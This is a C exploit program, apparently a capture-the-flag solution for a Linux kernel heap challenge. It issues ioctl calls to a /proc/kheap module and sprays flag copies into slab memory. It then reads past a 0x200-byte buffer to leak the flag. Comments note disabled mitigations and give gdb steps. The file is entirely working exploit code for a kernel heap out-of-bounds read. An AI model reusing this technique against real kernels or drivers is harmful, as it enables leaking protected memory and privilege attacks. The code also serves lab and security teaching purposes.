#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#define CMD_PRINT 22274
#define CMD_COPY_FLAG 22276
#define CMD_COPY_TO_USER 22272
#define CMD_COPY_FROM_USER 22273
struct kheap_req_t {
  void * ubuf;
  size_t size;
};
int main() {
    int fd = open("/proc/kheap", O_RDWR);
    char buf[0x1000] = {0};
    struct kheap_req_t req = {buf, 0};
    req.size = 0x200;
    memset(buf, '0', 0x1000);
    ioctl(fd, CMD_COPY_FROM_USER, &req);
    for (int i = 0; i < 0x1000; i++)
      ioctl(fd, CMD_COPY_FLAG, &req);
    req.size = 0x1000;
    ioctl(fd, CMD_COPY_TO_USER, &req);
    printf("%s", &buf[0x200]);
    return 0;
}

// Protection:
// - No KASLR. 
// - CONFIG_SLAB_FREELIST_RANDOM=n
// - CONFIG_SLAB_FREELIST_HARDENED=n

// Debug:
// Use `sudo cat /proc/modules` to get kernel module base.
// gdb> add-symbol-file /challenge/challenge1.ko 0xffffffffc0000000
// gdb> b kheap_open
// gdb> b kheap_ioctl
// An aligned slub slot is 0x200 bytes.

// $ gcc exploit.c -o exploit